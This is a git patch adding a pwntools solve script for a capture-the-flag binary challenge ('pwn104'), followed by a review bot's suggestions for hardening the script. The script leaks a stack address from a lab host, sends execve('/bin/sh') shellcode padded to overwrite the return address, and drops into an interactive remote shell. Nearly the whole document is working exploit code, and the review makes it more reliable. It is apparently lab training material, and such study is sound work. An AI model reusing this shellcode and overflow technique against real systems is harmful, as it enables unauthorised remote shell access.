From 31dbf17bda348c081ce776521f1b83baa51a75d5 Mon Sep 17 00:00:00 2001
From: jc
Date: Mon, 28 Oct 2024 01:12:36 +0300
Subject: [PATCH] solve script
---
 thm_pwn101/pwn104/a.py | 31 +++++++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 thm_pwn101/pwn104/a.py
diff --git a/thm_pwn101/pwn104/a.py b/thm_pwn101/pwn104/a.py
new file mode 100644
index 0000000..c5cfd6c
--- /dev/null
+++ b/thm_pwn101/pwn104/a.py
@@ -0,0 +1,31 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./pwn104", checksec=False)
+# r = process()
+r = remote("10.10.167.194", 9004)
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# leak
+r.recvuntil(b"at ")
+stack = int(r.recvline().strip(), 16)
+log.info("stack: %#x", stack)
+
+# shellcode
+sc = """
+lea rdi, [rsi+13]
+mov al, 59
+cqo
+xor rsi, rsi
+syscall
+"""
+sc = asm(sc)
+sc += b"/bin/sh\0"
+sc += b"A"*(88-len(sc))
+sc += p64(stack)
+s(sc)
+
+r.interactive()
\ No newline at end of file
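Review bot: The offset in `lea rdi, [rsi+13]` is hard-coded to the byte length of the assembled stub that precedes `/bin/sh\0`, but nothing in the script checks that, so editing any instruction silently points execve at garbage; add `assert len(sc) == 13, len(sc)` right after `sc = asm(sc)`. Likewise `b"A"*(88-len(sc))` degrades to empty bytes if the stub ever exceeds 88 bytes and the `p64(stack)` return address lands at the wrong offset, so guard it with `assert len(sc) <= 88, len(sc)`. The stub also presumes that rsi still holds the buffer address and that the upper bytes of rax are already zero when `mov al, 59` runs — presumably true for the read() return path in pwn104, but worth a comment such as `# rsi == buf and rax < 256 (read() return) on entry; both unverified` since neither is checked. The lab host `10.10.167.194` is hard-coded next to a commented-out `process()`; pwntools' `args` (e.g. `r = remote(args.HOST or "10.10.167.194", 9004) if args.REMOTE else process()`) keeps the script usable when the target IP changes.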